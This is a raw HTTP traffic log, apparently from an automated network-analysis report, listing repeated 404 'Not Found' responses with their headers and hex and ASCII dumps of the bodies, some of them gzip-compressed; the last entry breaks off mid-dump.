Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 23:07:30 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 23:07:33 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 23:07:35 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 23:07:41 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FDccwmWDqjxiMVPLtQcSblNNYepiBCw%2FD6xukWzLuVQbImsSyj42Wjx9hESFFYC9JyOQAsu%2BNhahH6f7PmRGXP%2B6Uw8YvVoVVr%2FFriDGIV1spEgy88L%2FtBUA78r9QcjNq3FP"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9000531ee9cc72b9-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1818&min_rtt=1818&rtt_var=909&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=747&delivery_rate=0&cwnd=215&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 29 ea 81 c3 6a 25 68 52 b5 52 28 11 b8 07 8e 06 6f e5 4a 6d 9c d8 5b 22 fe 1e 25 15 12 d7 99 37 a3 19 ba ab 5e d7 f6 a3 ad 61 6b 5f 1a 68 0f cf cd 6e 0d 8b 7b c4 5d 6d 37 88 95 ad 6e ce 43 51 22 d6 fb 05 1b 0a 7a 39 33 05 71 9e 0d e9 49 cf c2 ab 72 05 fb a8 b0 89 d7 ce 13 de 44 43 38 43 f4 19 fd cf 94 5b f2 3f 26 2c d9 50 cf 36 08 24 19 ae 92 55 3c 1c de 1a 18 5d 86 2e 2a 1c 27 0e 62 07 1a 4e 19 b2 a4 6f 49 05 61 3f 35 25 36 e4 bc 4f 92 33 3f f5 ee 2b 08 bc cf 00 38 85 71 1c 8b 8b cb 2a 69 18 8a 3e 45 68 63 52 78 2c 09 ff 22 86 70 de 44 38 7f f9 05 00 00 ff ff e3 02 00 2a 59 1a 36 06 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e0LN0Dw)j%hRR(oJm["%7^ak_hn{]m7nCQ"z93qIrDC8C[?&,P6$U<].'bNoIa?5%6O3?+8qi>EhcRx,"pD8*Y60
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 23:07:43 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MYIthD02RKKTyrl1pOPzk4sOazbf9iknn7dYxIccMNGIMJuFVDYZVSS7IBx8Zkx4efWyrX9yT0m14Qv329jquJ0e64FiJ1YogtRESaBJut7Ff62g3OgwlKXcv16CiZVOf1H8"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9000532eef14c327-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1752&min_rtt=1752&rtt_var=876&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=771&delivery_rate=0&cwnd=187&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 65 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 29 ea 81 c3 6a 25 68 52 b5 52 28 11 b8 07 8e 06 6f e5 4a 6d 9c d8 5b 22 fe 1e 25 15 12 d7 99 37 a3 19 ba ab 5e d7 f6 a3 ad 61 6b 5f 1a 68 0f cf cd 6e 0d 8b 7b c4 5d 6d 37 88 95 ad 6e ce 43 51 22 d6 fb 05 1b 0a 7a 39 33 05 71 9e 0d e9 49 cf c2 ab 72 05 fb a8 b0 89 d7 ce 13 de 44 43 38 43 f4 19 fd cf 94 5b f2 3f 26 2c d9 50 cf 36 08 24 19 ae 92 55 3c 1c de 1a 18 5d 86 2e 2a 1c 27 0e 62 07 1a 4e 19 b2 a4 6f 49 05 61 3f 35 25 36 e4 bc 4f 92 33 3f f5 ee 2b 08 bc cf 00 38 85 71 1c 8b 8b cb 2a 69 18 8a 3e 45 68 63 52 78 2c 09 ff 22 86 70 de 44 38 7f f9 05 00 00 ff ff e3 02 00 2a 59 1a 36 06 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: e0LN0Dw)j%hRR(oJm["%7^ak_hn{]m7nCQ"z93qIrDC8C[?&,P6$U<].'bNoIa?5%6O3?+8qi>EhcRx,"pD8*Y60
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 23:07:46 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=t2iJhmgBmKnyFJo4rCS2ZRfplDt1OL5302e141Nsm78peU2t6Lr1fatVPuExFeoP2nW0bbKO%2F3HWwaO0FWD7AZWLvoyrKvBp56QxkZBCI7k9B4EK7k6lNF5mCU%2FHwiBDBFQl"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9000533eef328cda-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1802&min_rtt=1802&rtt_var=901&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1784&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 64 36 0d 0a 4c 8f c1 4e c3 30 10 44 ef fe 8a a5 77 b2 29 ea 81 c3 6a 25 68 52 b5 52 28 11 b8 07 8e 06 6f e5 4a 6d 9c d8 5b 22 fe 1e 25 15 12 d7 99 37 a3 19 ba ab 5e d7 f6 a3 ad 61 6b 5f 1a 68 0f cf cd 6e 0d 8b 7b c4 5d 6d 37 88 95 ad 6e ce 43 51 22 d6 fb 05 1b 0a 7a 39 33 05 71 9e 0d e9 49 cf c2 ab 72 05 fb a8 b0 89 d7 ce 13 de 44 43 38 43 f4 19 fd cf 94 5b f2 3f 26 2c d9 50 cf 36 08 24 19 ae 92 55 3c 1c de 1a 18 5d 86 2e 2a 1c 27 0e 62 07 1a 4e 19 b2 a4 6f 49 05 61 3f 35 25 36 e4 bc 4f 92 33 3f f5 ee 2b 08 bc cf 00 38 85 71 1c 8b 8b cb 2a 69 18 8a 3e 45 68 63 52 78 2c 09 ff 22 86 70 de 44 38 7f f9 05 00 00 ff ff e3 02 00 2a 59 1a 36 06 01 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: fd6LN0Dw)j%hRR(oJm["%7^ak_hn{]m7nCQ"z93qIrDC8C[?&,P6$U<].'bNoIa?5%6O3?+8qi>EhcRx,"pD8*Y60
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 23:07:49 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=izPwMVwOInAEKTSf5tHJCvEcM3yzNQe3J%2F4taaywv3RCrnajSxmHFYZmLoVaHVYyKo%2BCvLEoeXRWeHBDB715koEzPYnqb170XkdGwcCdmya7oxAQyYnZEWaYILh38X1ckr0B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9000534f0db88cda-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1777&min_rtt=1777&rtt_var=888&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=496&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 30 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 61 73 74 65 72 71 71 2e 70 72 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 106<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.masterqq.pro Port 80</address></body></html>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 23:08:21 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 23:08:24 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 23:08:27 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 23:08:29 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Fri, 10 Jan 2025 23:08:35 GMTserver: LiteSpeedData Raw: 31 33 35 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 3a e9 72 e2 5c 76 ff bf a7 20 4e 25 99 29 b5 5b 2b 20 3c 76 cf 68 43 12 20 21 09 04 88 54 ea 2b ed 12 5a d1 0e 53 79 a0 bc 46 9e 2c 57 d8 6e 63 da fe ba 27 95 1f b9 fe 81 ee 76 ee d9 cf f5 39 f7 b7 df 7e 7b fc 27 76 c9 ac 0d 85 1b 04 55 12 7f fb ed f1 f9 67 00 da 63 e0 9a ce b7 df 2e 9f 89 5b 99 60 45 95 df bb c7 3a 6c 9e ee 98 2c ad dc b4 ba af 4e b9 7b 37 b0 9f 7b 4f 77 95 db 55 70 0f e2 2f 03 3b 30 8b d2 ad 9e ea ca bb 27 ef 3e 85 63 da 81 7b df ef 2f b2 f8 0a 50 9a dd db fd d4 a7 1b 95 c2 f4 13 f3 1f d9 c1 75 79 58 b8 e5 d5 16 e4 1d f4 d4 4c dc a7 bb 26 74 db 3c 2b aa ab 65 6d e8 54 c1 93 e3 36 a1 ed de 5f 3a 5f 06 61 1a 56 a1 19 df 97 b6 19 bb 4f e8 d7 ef a0 aa b0 8a dd 6f 04 42 0c e4 ac 1a 4c b3 3a 75 1e e1 e7 c1 67 56 96 d5 29 76 07 3d df 5e d8 65 97 e5 0b 1e 3d ab ad cc 39 0d fe 7e 59 da 77 fb e6 01 ee dc 7b 66 12 c6 a7 87 01 55 80 63 bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 6e 2b c3 b3 fb 30 40 89 bc 7b 3f 19 87 a9 7b 1f b8 a1 1f 54 60 fa 2b 81 91 c3 31 4a 60 93 f7 ab 2c d3 8e fc a2 a7 01 88 28 ce 8a 87 c1 3f 7b 97 f6 7e d9 eb 1c 36 c5 31 1c 79 3f 97 9b 8e 13 a6 fe c3 e0 66 3c 31 0b 3f 4c df 0d ff e7 77 f4 4b d7 ae c2 2c fd 02 48 cf 2a b7 b8 e1 87 13 96 79 6c 02 5e 58 71 66 47 ff 07 c7 7d ed f5 cf 04 1c b9 3d e9 19 c9 fb d8 f5 00 97 cc ba ca de 1f f6 32 5d 3c 73 f1 c7 f9 37 da 07 28 72 2d 81 37 4a bf 02 8d cc b3 b4 74 ef c3 d4 cb 6e 08 7d e5 2b 73 69 6f 67 5f 6d 2f 2b b3 aa 4b 20 1d c7 bd d9 7c d1 9a 67 f1 0f 11 e4 5f fe 68 77 e1 9a 65 96 7e be 1f 1b 5e ef ef 55 f2 33 11 5c 61 76 e1 a9 5d 5d e8 fa f2 5d b2 80 de fe ac fb de 51 dc 1c f8 4a 2d 72 69 1f e2 db eb 52 af 18 c0 f0 3e 60 d7 95 b6 16 6e ee 9a 40 66 c0 8d 3c 7f be 81 eb d1 bf 5a f9 7a 2a 36 c1 29 82 7a bf ec 75 6e 7a 69 6f 73 57 54 de 62 64 7e 42 d4 af 83 b8 0f 2b 37 29 6f c0 7c d7 24 0c e8 d1 0f a6 14 a6 6f a6 3c c1 3f 51 b4 6b 79 dc 40 7f d1 63 2b ab aa 2c 79 18 f4 67 bc 11 db f3 eb 4a 97 d0 d1 f5 e4 15 27 de c1 bf 65 43 2f ee 7b c7 b5 b3 c2 ec e5 f7 30 00 2e c5 2d 7a 27 f4 fe a0 57 8e 03 7f 44 33 57 d2 f8 f4 9c 87 20 6b dc e2 4a bf de a3 f1 e0 65 76 5d 7e 3e 6d 02 3f d3 dc 5a ce 2b 12 18 35 22 26 a3 37 04 af 90 f8 5c 8b 5f fd da 47 82 fa 05 36 d6 f1 8d 6c be 5b 5a 98 5e 7c f6 07 3e 2f 0e cb ea fe 12 56 7a 85 4f dd 41 56 57 65 08 1c 42 df 79 43 bf 17 e4 2b 76 37 ce f8 bb 7a 5d 8d bf 51 0b 70 8a c3 1b b4 bc 38 eb ed ab f7 8c ef 4f b8 48 da 8c 43 1f 08 d9 06 37 04 b7 78 9b 7f 03 f9 f5 c6 6e 5e 94 fe a3 93 2e 01 17 c4 a8 cf 7c 58 ef 08 ee c3 c4 f4 6f c5 f8 9d a8 4f 7d ef 65 6b 7f cb 01 01 ea 96 be 3e e6 b6 2f f1 d1 ca 62 e7 8d 8a 9e 8f d7 54 fe c8 83 36 2b 9c 7b 0b e8 48 04 62 54 ff 73 6f c6 f1 7b 00 bf 44 15 08 ea 40 b9 07 80 57 20 4a dc ba 84 cf 51 78 63 f3 87 e1 f3 7a e3 ad 84 ae 75 64 74 e3 6a 7e 00 f
